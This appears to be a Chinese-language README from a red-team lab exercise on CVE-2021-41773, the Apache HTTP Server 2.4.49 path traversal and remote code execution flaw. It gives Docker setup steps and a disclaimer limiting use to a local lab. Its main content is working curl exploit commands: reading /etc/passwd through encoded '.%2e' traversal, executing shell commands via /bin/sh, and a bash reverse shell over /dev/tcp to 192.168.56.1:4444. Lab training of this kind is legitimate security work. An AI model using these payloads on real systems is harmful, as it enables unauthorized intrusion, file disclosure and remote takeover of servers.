CVE-2021-41773 — Apache HTTP Server 2.4.49 路径遍历 / RCE
ITSOLERA 网络安全部门 — 红队任务 #3
团队: Offensive Team Zeta
日期: 2026年3月18日
⚠️ 免责声明
本仓库仅用于教育目的。
所有测试均在隔离的本地 Docker 实验环境中执行。
切勿用于在线、生产或第三方系统。
CVE 摘要
| 字段 | 详情 |
|---|
| CVE ID | CVE-2021-41773 |
| CVSS | 9.8 严重 |
| 受影响版本 | 仅 Apache HTTP Server 2.4.49 |
| 类型 | 路径遍历 + 远程代码执行 |
| 修复版本 | Apache 2.4.51 |
仓库内容
实验环境搭建
# 拉取存在漏洞的镜像
sudo docker pull blueteamsteve/cve-2021-41773:with-cgid
# 启动实验环境
docker-compose up -d
# 验证 Apache 2.4.49 是否运行
curl -I http://localhost:8080/
# 应显示: Server: Apache/2.4.49
利用方法
# 通过路径遍历读取文件
curl --path-as-is \
'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'
# 远程代码执行
curl --path-as-is \
-d 'echo Content-Type: text/plain; echo; id' \
'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
# 反弹 Shell(将 IP 替换为你本机的 IP)
curl --path-as-is \
-d "echo Content-Type: text/plain; echo; bash -c 'bash -i >& /dev/tcp/192.168.56.1/4444 0>&1'" \
"http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"
参考链接